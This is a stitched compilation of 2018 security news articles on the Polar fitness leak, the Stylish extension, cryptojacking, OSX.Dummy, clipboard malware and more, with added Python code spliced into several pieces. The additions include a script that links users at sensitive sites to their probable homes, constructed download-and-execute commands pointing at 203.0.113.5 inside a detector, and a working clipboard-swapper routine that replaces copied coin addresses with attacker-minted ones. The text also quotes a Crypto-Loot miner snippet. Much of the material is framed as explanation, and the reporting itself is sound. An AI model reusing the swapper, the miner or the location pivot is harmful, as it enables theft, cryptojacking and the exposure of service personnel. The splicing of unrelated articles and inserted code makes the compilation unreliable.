STE WILLIAMS

Fitness app Polar even better at revealing secrets than Strava

+Comment Online investigations outfit Bellingcat has found that fitness tracking kit-maker Polar reveals both the identity and daily activity of its users – including soldiers and spies.

Many users of Polar’s devices and app appear not to have paid attention to their privacy settings; as a result, a Bellingcat writer found 6,460 individuals from 69 countries whose digital breadcrumbs were scattered around more than 200 sensitive locations.

Bellingcat’s report claimed the Polar Flow social-fitness site exposes more compromising data than the fitness trackers behind previous leaks: “Compared to the similar services of Garmin and Strava, Polar publicizes more data per user in a more accessible way, with potentially disastrous results.”

“Tracing all of this information is very simple through the site: find a military base, select an exercise published there to identify the attached profile, and see where else this person has exercised.”

Bellingcat notes that the big difference between Polar and Strava is that the former offers more comprehensive data, more easily, covering everything a user has uploaded to the platform since 2014.
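The pivot Bellingcat describes (find a sensitive site, pick an exercise published there, then see where else that profile trains) is easy to express in code. The following is an added illustration written for this page, not Bellingcat’s tooling and not Polar Flow’s API: the watch-list coordinates and the exercise records are constructed, and a real export would carry timestamps and full GPS tracks rather than just start points.

```python
"""Pivot from a sensitive location to a profile's other activity, as the text describes.

Added illustration with constructed data; not Bellingcat's tooling and not Polar Flow's API.
"""
from collections import Counter, defaultdict
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in km between two WGS-84 points."""
    dlat, dlon = radians(lat2 - lat1), radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))

# Constructed watch-list: (name, centre latitude, centre longitude, radius in km). Coordinates are fictional.
SENSITIVE_SITES = [
    ("air base (fictional)", 52.000, 5.000, 1.5),
]

# Constructed public exercise records: (profile id, start latitude, start longitude).
EXERCISES = [
    ("runner_a", 52.401, 4.901), ("runner_a", 52.402, 4.899), ("runner_a", 52.400, 4.900),
    ("runner_a", 52.003, 5.002), ("runner_a", 52.001, 4.998),
    ("runner_b", 53.200, 6.500), ("runner_b", 53.201, 6.498),
]

def users_at_sensitive_sites(exercises, sites):
    """Step 1: which profiles have an exercise starting inside a watch-list radius?"""
    hits = defaultdict(set)
    for user, lat, lon in exercises:
        for name, site_lat, site_lon, radius_km in sites:
            if haversine_km(lat, lon, site_lat, site_lon) <= radius_km:
                hits[user].add(name)
    return dict(hits)

def likely_home(exercises, user, cell_deg=0.005):
    """Step 2: the densest ~0.5 km cell of a profile's start points. Runs tend to start at the front door."""
    cells = Counter()
    members = defaultdict(list)
    for u, lat, lon in exercises:
        if u != user:
            continue
        cell = (round(lat / cell_deg), round(lon / cell_deg))
        cells[cell] += 1
        members[cell].append((lat, lon))
    if not cells:
        return None
    pts = members[cells.most_common(1)[0][0]]
    return (sum(p[0] for p in pts) / len(pts), sum(p[1] for p in pts) / len(pts))

def profile_exposure(exercises, sites):
    """The full pivot: for every profile seen at a sensitive site, the site(s) and the probable home."""
    return {
        user: {"sites": sorted(names), "likely_home": likely_home(exercises, user)}
        for user, names in users_at_sensitive_sites(exercises, sites).items()
    }

if __name__ == "__main__":
    for user, info in profile_exposure(EXERCISES, SENSITIVE_SITES).items():
        print(user, info)
```

Nothing here needs more than the public start coordinates of each exercise, which is the point: the exposure comes from the default visibility, not from any weakness in the GPS data itself.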

The investigation describes all sorts of interesting targets in the data: an officer whose air base hosts nuclear weapons; Western military personnel in Afghanistan; yet another officer whose profile carries his name, and whose location hosts drones. People exercising near their homes, and also near their workplaces – which happen to be intelligence agencies.

“We were able to scrape Polar’s site (another security flaw) for individuals exercising at 200+ of such sensitive sites, and we gathered a list of nearly 6,500 unique users. Together, these users had made over 650,000 exercises, marking the places they work, live, and go on vacation,” Bellingcat’s Foeke Postma wrote.

Polar told the publication it had updated its policy in August 2017 so accounts have more secure default settings, and the platform has blocked users from exploring its data while it investigates fixes.

Over the weekend, in response to the revelations, the Dutch Minister of Defence issued an edict that military personnel should remove fitness apps from their smartphones.

Running in circles

The Dutch response may well feel familiar. Shortly after Nathan Ruser of the Australian National University revealed the extent of the Strava leak in January this year, the Pentagon warned personnel to lock down their privacy settings.

The official response included an investigation within the US military, but such things proceed relatively slowly. Army Colonel Robert Manning III said at the time: “DoD personnel are advised to place strict privacy settings on wireless technologies and applications.”

However, even if military and intelligence users had locked down their settings after that warning, Bellingcat’s Postma wrote that the platform still kept old data public until it stopped Internet passers-by browsing people’s records.

Yes, people with sensitive jobs need to be careful with social technologies, but it seems to be an open question just how well people in general understand how much data leaks when they sign up for online services.

The US military is, after all, easily large enough to act as a proxy for the whole population, and people at scale aren’t paying close attention to how their data leaks, until it stings them. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/09/fitness_app_polar_data_leak/

Snooping passwords from literally hot keys, China’s AK-47 laser, malware, and more

Roundup The week surrounding America’s “Huzzah, we kicked out the Brits, and will now spell color any way we like” Day, on July 4, is traditionally one of the slowest periods in the annual business tech news cycle.

IT security, on the other hand, never rests. We’ve covered Google cracking down on non-HTTPS sites, Fortnite cheats getting pwned by malware, a fascinating interview with plane hacker Chris Roberts, and even a new (and poorly written) computer crime novel cowritten by Bill Clinton.

But there were other stories bubbling under, so here’s the best of the rest.

Time to get patching Ubuntu

Canonical has issued a rash of new security patches for its Ubuntu GNU/Linux distribution – updates that should be installed as soon as possible.

Not all of these fixes are alike. If you’re running a system with an AMD processor, one patch removes an earlier update that was supposed to address the Spectre CPU vulnerability. That microcode-level mitigation left some AMD-powered systems unable to boot, and now has been given the boot from Ubuntu Linux computers.

There’s also a security update for Firefox packages, following critical fixes from Mozilla. Ubuntu’s PHP, Devscripts, and Archive Zip packages have also been given some secure code lovin’.

Regarding the Firefox updates, the security fixes were publicly issued by the browser’s maker Mozilla on June 25 and 26, but are only now making their way to Ubuntu users. Other Linux flavors, such as Debian, pushed out the Firefox security update to users days earlier.

We asked Canonical why the week-long hold up, and a spokesperson told us the Ubuntu team was “waiting for the point release from Mozilla before pushing out updates.” The Firefox snap is kept “up to date so users can install that if they want to run the latest version.”

Still, the delay irritated some: it meant people were left running vulnerable software while miscreants potentially developed exploits for the disclosed bugs.

Infosec consultant Stephan Verbücheln, based in Switzerland, told us earlier this week, before Ubuntu updated its Firefox packages: “Despite this version fixing several security issues with critical risk, Ubuntu has still not updated the version in their repositories. There is no reason to assume that Ubuntu staff was overwhelmed by a sudden Mozilla release.”

In any case, if you use Firefox, get the latest updates.

Beware the Therminator

No, not Arnie with a lisp, but instead an interesting bit of research into side-channel data-leaking techniques.

Boffins at the University of California Irvine have been doing some interesting work [PDF] on thermal imaging and passwords. Humans run quite hot thanks to our mammalian status, and it turns out the warmth fingertips leave on key tops after typing a password can be imaged to recover one’s login credentials.

You might think the heat a fingertip leaves on a plastic key would be too faint to matter, but it turns out a heat-sensing camera can spot keystrokes up to 45 seconds after the keys are pressed. It’s a canny bit of research that led the eggheads to postulate that we should consider dumping passwords altogether for a better system.

It’s a cute surveillance technique, but one can’t help wondering about its practicality. After all, if you have the kind of access to a target that allows this kind of thermal imaging, then why not just use a plain old camera to watch typed passwords, install a keylogger, or simply look over their shoulder?

Quick links

  • On July 11, the US Senate Committee on Commerce, Science, and Transportation will hold a hearing on the data-leaking Spectre and Meltdown CPU flaws.
  • Microsoft security researcher Matt Oh has taken apart a malware-laced PDF, reverse-engineering it in great and fascinating detail. Code within the document exploits now-fixed bugs in Windows and Adobe Acrobat to hijack the machine when the file is opened.
  • Watch out for this macOS software nasty: OSX.Dummy, which marks install on themselves after being tricked into running a command in Terminal that downloads and runs the thing. The malware opens a backdoor and makes a note of the Mac’s root password.
  • We hope you’ve patched your HP iLO 4 server firmware against CVE-2017-12542, fixed in August 2017, because research and proof-of-concept exploit code is now floating around. The flaw can be abused to bypass authentication and execute malicious code remotely. It can be as simple as sending 29 characters in a curl request.
  • Microsoft’s Windows 7 Defender has started receiving malware definition updates again after a week’s hiatus.

Portly piracy suspect is pissed off

The continuing saga of Kim Dotcom opened another chapter when the former owner of one of the most notorious file-sharing websites, Megaupload, lost his appeal against extradition.

The New Zealand courts ruled against Dotcom’s appeal against a verdict that would see him shipped off to the US to face charges of copyright infringement and fraud. His team has promised to appeal again to the country’s Supreme Court.

There had been earlier signs of hope for Dotcom, after a court ruling that he couldn’t be extradited for copyright infringement as the crimes occurred outside of New Zealand’s jurisdiction. But it was the fraud allegations that stuck.

Old dog, new tricks

One of the oldest families of malware, Rakhni, has received an upgrade.

The code has traditionally been used as a trojan to provide backdoor access to infected Windows PCs. Once installed, it can be used to scoop passwords and login details, but apparently that’s no longer enough, according to Kaspersky Lab.

Now the code’s masterminds have seen fit to add cryptocurrency-mining code into the software nasty. It’s adding insult to injury – first it steals your data, then your CPU cycles.

China perfects laser rifle

Something for the Flash Gordon fans: it seems that the Chinese have developed a laser rifle that actually works.

According to reports the compact, if rather ugly, rifle is dubbed the ZKZM-500 and has a range of half a mile. It can burn through clothing in seconds, scorch bare skin, and ignite petrol tanks on cars. It’s now ready for mass production, and will be coming to counter-terrorism squads in the Middle Kingdom.

Given that America is already worried about laser weapons being used by the Chinese military against its forces, this new weapon could spark a new, light-based arms race.

Move over Nigeria, Botswana’s in town

When you think African computer crime, Nigeria is the first place that comes to mind, thanks to numerous princes of the locale trying to snatch people’s money.

But there’s a new kid on the block, according to police in the southern African state of Botswana. In the last few months, the nation’s cops have been deluged with complaints from businesses far and wide that are getting ripped off online by miscreants within the country.

There are the traditional business invoice scams, but also fraudulent suppliers dropping off the radar once the money for orders has been sent, and even some enterprising scumbags using fake Facebook accounts to further aid scamming. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/07/security_roundup/

Chrome, Firefox pull very unstylish Stylish invasive browser plugin

Firefox and Chrome have removed a browser extension from their stores following revelations it was phoning home with users’ web-surfing histories.

The “Stylish” plug-in gained popularity because it let users configure sites’ appearance, rather than accepting the designers’ decisions.

However – stop us if you’ve heard this one before – the code changed hands last year and the new owners expanded its data slurping activities.

Software engineer Robert Heaton decided to take a look at what was being sent to Stylish’s owners, analytics company SimilarWeb, and was horrified.

As Heaton blogged, “HTTP requests that send a large blob of obfuscated data to a URL ending in /stats are almost never good news for users.”

While the SimilarWeb privacy policy for Stylish says it only collects anonymous data, Heaton found it was attaching an identifier to the data returned to the company.

“I looked closer at the decoded payload and noted a unique tracking identifier”, he wrote, adding “it only takes one tracking request containing one session cookie to permanently associate a user account with a Stylish tracking identifier. This means that Stylish and SimilarWeb still have all the data they need to connect a real-world identity to a browsing history, should they or a hacker choose to.”
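Heaton’s point, that one identifying request is enough to label an entire “anonymous” history, is worth seeing end to end. The following is an added illustration written for this page, not Heaton’s decoder and not the Stylish payload format: the beacon records are constructed, and the list of query parameters treated as identifying is an assumption of the example.

```python
"""Why a persistent tracking identifier defeats an 'anonymous' telemetry promise.

Added illustration with constructed beacon records; not Heaton's analysis code and not the
Stylish/SimilarWeb payload format, which is obfuscated and not reproduced by the article.
"""
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Query parameters that, on their own, name an account or a session. Assumed list for illustration.
IDENTIFYING_PARAMS = {"email", "user", "username", "account", "session", "sessionid", "token"}

# Constructed /stats beacons: each carries the extension's persistent id plus the URL the user visited.
BEACONS = [
    {"tracking_id": "stl-7f3a", "url": "https://news.example.org/politics/story-123"},
    {"tracking_id": "stl-7f3a", "url": "https://health.example.com/search?q=symptoms"},
    {"tracking_id": "stl-7f3a", "url": "https://mail.example.net/inbox?user=alice%40example.net&session=9f2c"},
    {"tracking_id": "stl-7f3a", "url": "https://jobs.example.com/apply/acme"},
    {"tracking_id": "stl-2b91", "url": "https://news.example.org/sport"},
]

def identifying_values(url):
    """(parameter, value) pairs in the query string that name a person or a logged-in session."""
    query = parse_qs(urlsplit(url).query)            # parse_qs also percent-decodes, so %40 becomes @
    return [(k, v[0]) for k, v in query.items() if k.lower() in IDENTIFYING_PARAMS]

def histories_by_tracking_id(beacons):
    history = defaultdict(list)
    for beacon in beacons:
        history[beacon["tracking_id"]].append(beacon["url"])
    return dict(history)

def reidentify(beacons):
    """Join: a single beacon carrying an identifier labels every URL ever sent under that tracking id."""
    result = {}
    for tracking_id, urls in histories_by_tracking_id(beacons).items():
        linked = {value for url in urls for _, value in identifying_values(url)}
        result[tracking_id] = {"identity": sorted(linked), "history": urls}
    return result

def redact(url):
    """What a collector that meant 'anonymous' would do before storage: drop the whole query string."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))

if __name__ == "__main__":
    for tracking_id, info in reidentify(BEACONS).items():
        print(tracking_id, info["identity"], len(info["history"]), "URLs")
    redacted = [{"tracking_id": b["tracking_id"], "url": redact(b["url"])} for b in BEACONS]
    print("after redaction:", reidentify(redacted)["stl-7f3a"]["identity"])
```

Stripping query strings is the minimum a collector needs to do to make the word “anonymous” defensible; leaving them in while attaching a stable identifier makes the join above a one-liner for the company or for anyone who later steals its database.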

Mozilla’s add-on assessors decided Stylish, as it now stands, is out of line and made the extension unavailable to Firefox users (although it requires manual removal for current users).

A post from Andreas Wagner was blunt about the reason: “We decided to block because of violation of data practices outlined in the review policy.”

Stylish in Google search

Still popular after it’s gone

As you can see above, Stylish was popular enough to be a front-page search result for “Chrome extensions”, but it’s now gone from the Google extensions store.

The Register asked SimilarWeb for comment. ®

PS: There is an open-source fork of Stylish sans analytics and tracking – Stylus.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/05/browsers_pull_stylish_but_invasive_browser_extension/

Japanese Coinhive JS injector slapped with suspended sentence

A Japanese man has received a suspended sentence for using the Coinhive cryptominer in a failed attempt to turn an illicit profit.

Masato Yasuda, 24, was told he’d be jailed for a year if he reoffended in the next three years over a scam that earned him just £34. The case is thought to be the first criminal prosecution over so-called cryptojacking worldwide.

Yasuda, an unemployed man from the city of Amagasaki in Hyōgo Prefecture, had hoped to, er, coin it in by planting Coinhive’s Monero-mining JavaScript on the PCs of third-party victims in January and February. Instead of making bank, he made what would have been barely enough to cover any taxi fare home from the police station.

Yasuda embedded the Coinhive JavaScript library inside a supposed game cheat tool that was offered for download, his defence lawyer told Bitcoin.com. The 90 resulting downloads brought in around 5,000 Japanese yen worth of Monero cryptocurrency (£34 or $45).

“The defendant regretted what he did, learning information ethics and other matters,” the sentencing judge Ryo Kato said, according to Japanese news outlet The Mainichi.

“This is the first criminal case of cryptojacking in the world that I’m aware of,” Troy Mursch, a security researcher active in tracking cryptojacking abuse, told El Reg. “Tracking down perpetrators can be difficult as Coinhive doesn’t require any user identification verification. After the mined Monero is paid out to a wallet, it’s basically untraceable beyond that.”

Adware, cracked games and pirated software have all been used by cybercriminals to secretly infect PCs with crypto-mining malware. Even more commonly, hackers plant code on compromised web pages so that the PCs of visiting surfers are press-ganged into mining, a practice most associated with the growing problem of cryptojacking.

Japanese authorities last month arrested 16 cryptojacking suspects as part of a local clampdown, according to reports.

Prosecutors reckon the 16 suspects hacked sites and inserted the Coinhive library into their code. The biggest earner among the 16 suspects allegedly made about 120,000 Japanese yen (£819, $1,085). ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/07/06/coinhive_conviction_japan/

Former NSO Group Employee Steals, Sells Spy Tools

The Israeli hacking firm says its stolen software is worth hundreds of millions of dollars.

NSO Group reports a former employee stole mobile hacking tools and tried to sell them on the Dark Web for $50 million in digital currency, according to a new indictment.

The Israeli hacking firm, primarily known for selling malware to break into iPhones, believes its mobile spy tools might have been sold to threat actors. A former employee allegedly stole malware, worth hundreds of millions of dollars, prior to his dismissal and attempted to sell it. The person he contacted as a potential buyer reported the illicit activity to NSO Group.

On June 5, officials arrested a suspect who previously worked for NSO Group as a senior programmer with access to corporate servers and privately owned tools, Reuters reports. He has been charged with employee theft, attempting to sell security software unlawfully, and attempting to harm property in a way that could prove harmful to state security.

Read more details here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.

Article source: https://www.darkreading.com/attacks-breaches/former-nso-group-employee-steals-sells-spy-tools/d/d-id/1332229?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

New Malware Strain Targets Cryptocurrency Fans Who Use Macs

OSX.Dummy depends on substantial help from an unwary victim.

A new strain of MacOS malware is targeting those who like to discuss their cryptocurrency investing in Slack or Discord groups. It depends on a certain level of naiveté on the part of the victim – a level that resulted in the strain being labeled OSX.Dummy.

The social engineering attack presents a request from a user identifying themselves as an administrator of the group. They ask the victim to run a lengthy command in a terminal window, then ignore the 34 MB file that is downloaded. If the victim does both of these things, they find that their Macintosh has been hijacked by a hacker using a C&C server in the Netherlands.
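The lesson from both OSX.Dummy write-ups on this page (the Register quick link and this one) is that the victim supplies the execution step by pasting a command they do not understand. The following added example is a triage helper for exactly that situation: it splits a one-liner into its simple commands and flags download-and-execute patterns. It is not code from either article, the sample commands are constructed (TEST-NET address 203.0.113.5) and are not the real OSX.Dummy command, which the text does not reproduce, and it assumes Python 3.8+ for shlex’s punctuation handling.

```python
"""Triage a pasted 'run this in Terminal' one-liner for download-and-execute behaviour.

Added example for the OSX.Dummy write-ups; not code from either article. The constructed commands
below are illustrative and are NOT the actual OSX.Dummy command, which the text does not reproduce.
Requires Python 3.8+ (shlex punctuation_chars together with whitespace_split).
"""
import re
import shlex

FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "ruby", "osascript"}
OUTPUT_FLAGS = {"curl": ("-o", "--output"), "wget": ("-O", "--output-document")}
OPERATORS = {";", "&&", "||", "|", "&"}
URL_RE = re.compile(r"https?://\S+")
BARE_IP_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)")

def _base(token):
    """Last path component, so ./script, /tmp/script and script compare equal."""
    return token.rsplit("/", 1)[-1]

def split_pipeline(cmd):
    """Split on ; && || | & into simple commands; ops[i] joins segments[i] and segments[i + 1]."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    segments, ops, current = [], [], []
    for token in lex:
        if token in OPERATORS:
            segments.append(current)
            ops.append(token)
            current = []
        else:
            current.append(token)
    segments.append(current)
    return segments, ops

def _saved_name(prog, args):
    """File name a fetcher will write, or None when it writes to stdout."""
    for flag in OUTPUT_FLAGS[prog]:
        if flag in args and args.index(flag) + 1 < len(args):
            return _base(args[args.index(flag) + 1])
    urls = [a for a in args if URL_RE.match(a)]
    if urls and (prog == "wget" or "-O" in args):      # wget default / curl -O: remote file name
        return _base(urls[0].rstrip("/"))
    return None

def assess_one_liner(cmd):
    """Human-readable findings; an empty list means no download-and-run pattern was seen."""
    findings = []
    segments, ops = split_pipeline(cmd)
    downloaded = set()
    for i, seg in enumerate(segments):
        if not seg:
            continue
        prog, args = _base(seg[0]), seg[1:]
        if prog == "sudo":                               # the command will prompt for the account password
            findings.append("asks for your account password via sudo")
            if not args:
                continue
            prog, args = _base(args[0]), args[1:]
        piped_into = None
        if i < len(ops) and ops[i] == "|" and segments[i + 1]:
            piped_into = _base(segments[i + 1][0])
        if prog in FETCHERS:
            if piped_into in INTERPRETERS:
                findings.append(f"pipes {prog} output straight into {piped_into}")
            if any(BARE_IP_RE.match(a) for a in args):
                findings.append("fetches from a bare IP address rather than a named host")
            name = _saved_name(prog, args)
            if name:
                downloaded.add(name)
        if prog == "base64" and piped_into in INTERPRETERS:
            findings.append(f"decodes a base64 blob and feeds it to {piped_into}")
        if prog in {"python", "python3", "perl"} and any(f in args for f in ("-c", "-e")):
            if any("http" in a for a in args):
                findings.append(f"inline {prog} script with an embedded URL")
        if prog == "chmod" and downloaded & set(map(_base, args)):
            findings.append("marks the downloaded file executable")
        elif prog in downloaded:
            findings.append(f"executes the downloaded file {prog}")
    return findings

# Constructed samples; nothing here is the real OSX.Dummy command.
SAMPLES = {
    "dropper": "cd /tmp && curl -s http://203.0.113.5/script -o script && chmod +x script && sudo ./script",
    "pipe": "curl -fsSL https://203.0.113.5/setup.sh | bash",
    "benign": "brew install node",
}

if __name__ == "__main__":
    for label, cmd in SAMPLES.items():
        print(label, assess_one_liner(cmd) or "nothing suspicious")
```

A helper like this is no substitute for understanding the command, but it catches the three things the article’s victims missed: the download, the step that makes it executable, and the request for a password.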

In a comment supplied to Dark Reading, Ryan Benson, senior threat researcher at Exabeam said, “A lot of otherwise non-technical people have jumped on the cryptocurrency bandwagon and want to get involved. Cryptocurrencies are inherently technical, so these less-technical users may be used to following technical how-tos without really understanding what the commands they run are doing. This puts them in dangerous territory and ripe for an attack like this, even if it is ‘dumb.'”

For more, read here and here.

Article source: https://www.darkreading.com/attacks-breaches/new-malware-strain-targets-cryptocurrency-fans-who-use-macs/d/d-id/1332230?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Putin Pushes for Global Cybersecurity Cooperation

At a Moscow-based security conference, Russian President Vladimir Putin said countries should work together amid the rise of cyberthreats.

Russian President Vladimir Putin called on countries to better cooperate in the fight against cyberattacks during his address at a Moscow security conference.

Putin discussed how cyberthreats have escalated around the world and said “some nations’ egoism” and “attempts to act squarely to their own advantages” have damaged data stability around the world, ABC News reports. 

Russia has recently joined efforts with European countries on an agreement to protect personal data, Putin said. He said Russia would develop a system to automate data exchange between the private sector and law enforcement to improve security, the report states.

The topic of Russian election meddling was not addressed.

Read more details here.

Article source: https://www.darkreading.com/threat-intelligence/putin-pushes-for-global-cybersecurity-cooperation/d/d-id/1332232?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

SIM card in bird’s GPS tracker used to rack up $2,700 phone bill

A migrating, tagged, male white stork—known to the Polish environmentalists who were tracking him as “Kajtek”—blipped out of contact on 26 April.

That, however, did not stop him from making good use of the SIM card in his GPS tracker, with which the bird—or somebody who found the GPS device and picked it apart in order to get at the card—racked up a $2,700 phone bill.

As IFL Science reports, Kajtek was last located at the Blue Nile valley in Sudan, on his way back home to Poland after successfully making his annual 6,000-kilometer (3,700-mile) trip to Africa, when his GPS tracker showed that he had stopped moving.

White storks aren’t endangered, though their habitats are threatened. The birds spend the warm summer months of the breeding season in parts of central and southern Europe—including in Poland—the Middle East, and west-central Asia before heading to Africa to spend the winter.

When his GPS tracker showed that Kajtek had stopped moving, researchers at the environmental group Grupa EkoLogiczna—EcoLogic—assumed the bird was dead. They had placed the tracker on him in April 2017: a “fairly routine” practice, as you can see by the many accounts of tagging white storks that the group posts to Facebook.

It was 26 April when things got weird. That’s when the scientists who were monitoring Kajtek’s tracker noticed that the bird’s signal again started to move, taking a roundabout, 25-kilometer (16-mile) trip before it went dead.

Then, a number of weeks later, on 7 June, EcoLogic got the giant bill from its phone company. According to The Register, the group said in June that someone pulled apart the tracker to get at the SIM card, then used it for a marathon call-everywhere-and-everyone spree.

EcoLogic told IFL Science that it doesn’t know who made the calls, but it will likely have to fork over the money for the phone bill out of its own pocket.

On average, white storks measure 100–115 cm (39–45 in) from beak tip to tail end, with a 155–215 cm (61–85 in) wingspan that lets them ride air thermals on their long journeys. They skip the Mediterranean in order to get into those thermals, which don’t form over water. In order to do that, they detour via the Levant in the east or the Strait of Gibraltar in the west.

Given the time lag between Kajtek’s cessation of movement and the phone-calling marathon, it seems unlikely that this magnificent beast was shot down just so somebody could get their hands on his tracker’s SIM card.

At least, let’s hope that’s not what happened. It’s bad enough that endangered animals are at growing risk of GPS “cyber-poachers”—including photographers, hunters and professional poachers—who use trackers to hunt them down.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/rx4FcWVTAyc/

Are cybercrooks watching you copy and paste? [VIDEO]

Malware that rummages through your clipboard is not new – after all, the clipboard is how you transfer data that’s important enough to move between two applications, so the contents of the clipboard are self-selectingly interesting to crooks.

In fact, in an amusing irony, the ⌘ key used on Macs for the copy-and-paste combinations ⌘C and ⌘V (the equivalent of Ctrl+C and Ctrl+V on Windows) is officially known in Unicode as the PLACE OF INTEREST SIGN.

Better yet for cybercriminals, but worse still for you, is that the clipboard is often the primary way that you “type in” critical machine-generated data that’s a hassle to enter character-by-character each time you need it.

You probably use the clipboard yourself all the time for “text strings of interest” such as passwords like P455//()Rdz, invoices or account numbers like 2BBE-64-903555X2-B, and cryptocurrency payment addresses like 1J87dFm62avMYZjWaituZTw9PXBvaguEMr.

We recently wrote about a malware sample with the unassuming name of Troj/Agent-AZHF that spies on your clipboard specifically to look out for cryptocoin addresses that you’re about to send money to – it knows how to recognise addresses for Bitcoin, Dogecoin, Litecoin, Dash, Ethereum, Namecoin, Zcash and Peercoin.

Clipboard-manipulating malware might sound pretty unsophisticated at first, but it can steal digital money from you without the hassle of cracking passwords, reading cryptocoin wallets, or peeking at private keys, and even without making any network connections to suspicious command-and-control servers.
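To recognise an address reliably enough to swap it, a clipboard swapper has to do more than pattern-match: a checksum check is what stops it from mangling invoice numbers that merely look base58-ish. The following added example shows that recognition logic, the swap itself, and the “check twice” comparison from the end of the article. It is not Sophos’s code and not Troj/Agent-AZHF; the version bytes are taken from the public chain parameters of four of the coins the text names and are an assumption of the example, as are the sample clipboard strings (the Bitcoin address used is the public genesis-block address, a standard test vector).

```python
"""Recognise cryptocoin addresses the way a clipboard swapper must, then show the swap and the check.

Added example for the clipboard-malware discussion; not Sophos's code and not Troj/Agent-AZHF.
Version bytes are taken from public chain parameters of four of the coins the text names and are an
assumption of this example, as are the sample clipboard strings in __main__.
"""
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# Mainnet base58check version bytes (P2PKH / P2SH) for coins the malware is said to recognise.
VERSION_BYTES = {
    0x00: "bitcoin", 0x05: "bitcoin",
    0x30: "litecoin", 0x32: "litecoin",
    0x1e: "dogecoin",
    0x4c: "dash",
}
BASE58_RE = r"[1-9A-HJ-NP-Za-km-z]{25,35}"
ETH_RE = r"0x[0-9a-fA-F]{40}"
TOKEN_RE = re.compile(rf"\b(?:{ETH_RE}|{BASE58_RE})\b")

def b58decode(s):
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)            # ValueError on a character outside the alphabet
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_ones = len(s) - len(s.lstrip("1"))          # each leading '1' encodes a 0x00 byte
    return b"\x00" * leading_ones + body

def b58encode(raw):
    n = int.from_bytes(raw, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    leading_zeros = len(raw) - len(raw.lstrip(b"\x00"))
    return "1" * leading_zeros + out

def checksum(payload):
    """base58check: first four bytes of SHA-256(SHA-256(payload))."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]

def make_address(version, hash160):
    """Build a valid address for a 20-byte hash; here used to mint the attacker's replacement addresses."""
    payload = bytes([version]) + hash160
    return b58encode(payload + checksum(payload))

def classify_address(token):
    """Coin name for a valid address, else None. The checksum check is what keeps false positives down."""
    if re.fullmatch(ETH_RE, token):
        return "ethereum"                                # EIP-55 mixed-case checksum not verified here
    if not re.fullmatch(BASE58_RE, token):
        return None
    raw = b58decode(token)
    if len(raw) != 25 or checksum(raw[:-4]) != raw[-4:]:
        return None
    return VERSION_BYTES.get(raw[0])

def malware_rewrite(clipboard_text, attacker_addresses):
    """What the swapper does on every clipboard change: replace recognised addresses coin-for-coin."""
    def swap(match):
        coin = classify_address(match.group(0))
        return attacker_addresses.get(coin, match.group(0))
    return TOKEN_RE.sub(swap, clipboard_text)

def paste_is_intact(copied, pasted):
    """The article's 'check twice', automated: what arrives must equal what you copied."""
    return copied == pasted

if __name__ == "__main__":
    # Constructed clipboard contents; the address is the public Bitcoin genesis-block address.
    copied = "Send 0.5 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa by Friday"
    attacker = {"bitcoin": make_address(0x00, b"\xaa" * 20)}
    pasted = malware_rewrite(copied, attacker)
    print(pasted)
    print("intact:", paste_is_intact(copied, pasted))
```

The swapped string is the same length and shape as the original, which is why eyeballing the first and last few characters is not enough: compare the whole address, or better, have the wallet show you the decoded recipient before you confirm.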

Watch our video to learn how clipboard malware works, and what to do about it…

If you have any questions or comments about the video, please leave them below and we’ll do our best to answer them.

Thanks for watching, and remember: after you copy-and-paste, check twice, click once.


Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/sQ1eCbHd9jk/

The Pirate Bay is plundering your CPU for cryptocash, again

Popular file sharing site The Pirate Bay seems to have returned to its old tricks again by mining cryptocurrency in visitors’ browsers without telling them. Last month, a user called okremix posted a complaint in Suprbay, which is the Pirate Bay’s official forum.

I wanted to upload my torrents to TPB and because of the current upload error (file not found) I left the tab open and noticed that my CPU was getting really hot.
I remember that TPB was testing background mining in the past, so I checked the source on the upload page and there it was.

He posted a segment of JavaScript designed to mine for cryptocurrency.

    // CRLT is the Crypto-Loot loader object, provided by a script tag elsewhere on the page
    var miner = new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {  // publisher's site key
        throttle: 0.9,  // 0.9: mining threads idle about 90% of the time (Coinhive-style semantics), keeping the CPU load inconspicuous
    });
    miner.start();

Browser-based cryptominers use code embedded in a web page to force your machine into solving the complex mathematical problems that earn cryptocurrency. Instead of doing it for you, though, they do it for someone else.

Occasionally, publishers will give you the option to mine for cryptocurrency if you don’t want to read their ads. More often, crooks hack someone’s website to embed the code without their knowledge.

Sometimes, as was the case with the Pirate Bay first time around at least, the site owner embeds the code themselves but doesn’t tell visitors. When the person visiting the website doesn’t know about the mining and doesn’t give their permission, that can be classified as cryptojacking.

